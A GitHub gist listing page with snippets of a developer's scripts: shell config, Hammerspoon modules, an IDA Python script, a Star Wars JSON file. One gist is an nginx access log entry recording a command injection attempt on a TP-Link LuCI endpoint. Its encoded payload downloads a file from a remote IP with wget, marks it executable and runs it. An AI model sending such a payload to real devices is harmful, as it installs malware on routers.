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Zachary Cutlip zcutlip

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zcutlip / zsh_completion.zsh
Created December 15, 2024 04:07
ZSH: check for vscode before running 1Password `op completion`
# 'op' completion for some reason causes VSCode to trigger a
# "would like to access data from other apps" prompt
# this happens when vscode or an extension sources your .zshrc
# we need to check for VSCODE_RESOLVING_ENVIRONMENT, since vscode and
# some extensions set that
# We ALSO need to check TERM_PROGRAM since opening an interactive terminal session
# within vscode will *also* trigger the TCC prompt
if [ -z "$VSCODE_RESOLVING_ENVIRONMENT" ] && [ "$TERM_PROGRAM" != "vscode" ];
# initialize 1Password cli completions if 'op' exists
zcutlip / access.log
Last active July 25, 2024 03:59
Command injection attempt found in nginx access log - - [24/Jul/2024:12:57:14 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 162 "-" "Go-http-client/1.1"
zcutlip / kill_ss.lua
Created May 24, 2024 23:12
Hammerspoon module to kill `legacyScreensaver`
screenSleep = false
screenSaver = false
screenLock = false
place in ~/.hammerspoon/kill_screensaver/
load from your hammerspoon init.lua:
require "kill_screensaver.kill_ss"
A to kill legacyScreenSaver when the screen saver exits and/or screen wakes
legacyScreenSaver has a memory leak that causes it to consume many gigabytes of memory over
zcutlip / shell_history_backup.zsh
Last active November 10, 2023 21:36
Shell history backup function
# shellcheck shell=bash
# shellcheck disable=SC1091
# source from .zshrc or similar:
# source "$DOTFILES/shell_history_backup.zsh" && _backup_shell_hist
function _backup_shell_hist(){
_histfile_base="$(basename "$HISTFILE")"
zcutlip / CommerceKit.h
Created December 9, 2021 00:35
Working progress on CommerceKit class dumping
./ ../build/Release/formatType ./CommerceKit.json
@interface CKDialogController : CKServiceInterface
zcutlip /
Created July 15, 2021 20:58
IDA python script that prints to console in batch mode
import idc
import os
# you won't see this on the console
class Log:
def __init__(self, logfile):
self.logfile = logfile
zcutlip / swp.json
Last active July 2, 2021 01:01
Star Wars Planets
"meta": {
"date": "2021-07-02T01:01:52+00:00",
"url": ""
"planets": {
"Abafar": {
"appearances": [
"title": "Star Wars: The Clone Wars",
zcutlip / ascii_radio.txt
Created June 4, 2021 19:31 — forked from nick3499/ascii_radio.txt
Python 3: Radio Streams VLC: csv.reader(),
:::::::.. :::. :::::::-. ::: ...
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[[[,/[[[' ,[[ '[[, `[[ [[[[[,[[ \[[,
$$$$$$c c$$$cc$$$c $$, $$$$$$$$, $$$
888b "88bo,888 888,888_,o8P'888"888,_ _,88P
Date/time: 2021-03-02T18:47:39.428075-08:00
Information source:
Planets added:
Endor (Sanctuary)
zcutlip / fahmonitor.lua
Created June 14, 2020 17:00
Hammerspoon module to pause/unpause Folding@Home
screenSleep = false
screenSaver = false
screenLock = false
A module to pause/unpause Folding@Home depending on screensaver, screen lock, and
screen sleep state.
Folding@Home's "only when idle" mode does not pause/unpause the client at obvious times
or for obvious reasons. Instead, This module uses screen state as in indicator that the
user is/isn't interacting with the system.